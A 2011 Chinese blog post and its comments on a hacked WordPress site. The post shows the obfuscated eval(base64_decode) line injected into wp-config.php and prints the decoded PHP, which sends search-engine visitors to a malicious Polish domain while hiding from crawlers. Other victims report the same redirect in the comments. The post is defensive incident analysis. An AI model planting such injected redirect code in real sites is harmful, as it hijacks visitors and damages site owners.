柴子 让我们面对现实,让我们忠于理想!

2011.08.29

08.29.2011 · Posted in 杂谈

昨天在微博看到一个不错的个人博客站点出现问题,google搜索结果被劫持,直接跳转到hitpitlit.osa.pl。当时柴子就联想到最近的美国ISP劫持事件(链接),结果走入歪路,还是天毅和A.shun 判断正确,是被人植入了代码。

刚才天毅拿到cp,直接查看代码,最后终于在wp-config.php中发现问题(真猥琐,该文件不会随着程序更新而更新)

eval(base64_decode(“DQoNCmVycm9yX3JlcG9ydGluZygwKTsNC…………QoJfQ0KCX0=”)); (不完全引用,太长)

base64解码后:

  • ···
  • error_reporting(0);
  • $qazplm=headers_sent();
  • if (!$qazplm){
  • $referer=$_SERVER[‘HTTP_REFERER’];
  • $uag=$_SERVER[‘HTTP_USER_AGENT’];
  • if ($uag and !stristr($uag,”StackRambler”) and !stristr($uag,”aport”) and !stristr($uag,”WebAlta”) and !stristr($uag,”aport”) and !stristr($uag,”compatible; Yandex”) and !stristr($uag,”dyatel”)) {
  • if (stristr($referer,”yandex”) or stristr($referer,”yahoo”) or stristr($referer,”google”) or stristr($referer,”bing”) or stristr($referer,”rambler”) or stristr($referer,”gogo”) or stristr($referer,”live”)  or stristr($referer,”aport”) or stristr($referer,”nigma”) or stristr($referer,”webalta”) or stristr($referer,”meta.ua”) or stristr($referer,”bigmir.net”) or stristr($referer,”tut.by”) or stristr($referer,”ukr.net”) or stristr($referer,”poisk.ru”) or stristr($referer,”liveinternet.ru”) or stristr($referer,”gde.ru”) or stristr($referer,”quintura.ru”) or stristr($referer,”qip.ru”) or stristr($referer,”mail.ru”) or stristr($referer,”metabot.ru”)) {
  • if (!stristr($referer,”cache”) or !stristr($referer,”inurl”)){
  • header(“Location: http://hitpitlit.osa.pl/threat/”);
  • exit();
  • }
  • }
  • }
  • }

天毅怀疑是前苏联尤其是俄罗斯人的代码,哦~ 传说中地球上最强悍的地区

21 Responses to “2011.08.29”

  1. 柴子大神威武!

    [回复]

  2. 牛人现身~~ 其实应该不说是你拿到cp,直接描述成hack进去查看代码,这故事就完美了

    [回复]

  3. 楼上的都是大神,小菜前来膜拜!

    [回复]

    柴子 回复:

    我楼上的才是……

    [回复]

  4. 受害者来报到。。。感谢二位大神鼎立相助啊~

    [回复]

    柴子 回复:

    客气,基本都是天毅的功劳~

    [回复]

  5. lowstz says:

    楼上大神,前来膜拜,瞻仰

    [回复]

    柴子 回复:

    讨打

    [回复]

    呵呵 回复:

    你们都是大神

    [回复]

    Terry Chen 回复:

    你应该回复:你才是大神,你全家都是大神。

    [回复]

    柴子 回复:

    楼上的除我外全在跳大神。。

    [回复]

  6. 个人站长的悲哀,有时要认真做站,偏偏有人阻碍。

    [回复]

  7. 猴子 says:

    我也有这个问题。。。代码也差不多 。。大神 。。怎么处理啊 。。我都替换了 但是 又出现 又替换了 又出现。。。大神 怎么 根治啊。 膜拜中。。

    [回复]

    天毅 回复:

    分析你的access log试试看……

    [回复]

    柴子 回复:

    问题解决了?

    [回复]

  8. 愤怒的小鸟 says:

    大神啊,我的网站也是这样,已经困扰好久了,清理之后过几天又出来,跳转的网址也是这个,求救解决办法啊。。。

    [回复]

    柴子 回复:

    查看你的wp-config.php,清除掉恶意代码

    [回复]

  9. 遇到同样的问题,我被劫持到costabrava.bee.pl
    根据您的提示,已经清除,十分感谢!

    [回复]

    柴子 回复:

    客气,解决问题就好

    [回复]

  10. 我的博客也被挂了这个木马,根据博主的方法处理了,在等谷歌审核的结果。

    感谢博主!

    by the way,博主知不知道这个木马怎么挂上去的。我想应该不是在后台。很可能进我的空间直接修改文件了。

    [回复]

    柴子 回复:

    被挂的话,肯定还是拿到后台或ftp了

    [回复]

Leave a Reply

与文章无关的内容请在留言簿留言,以保持评论和文章内容的相关性。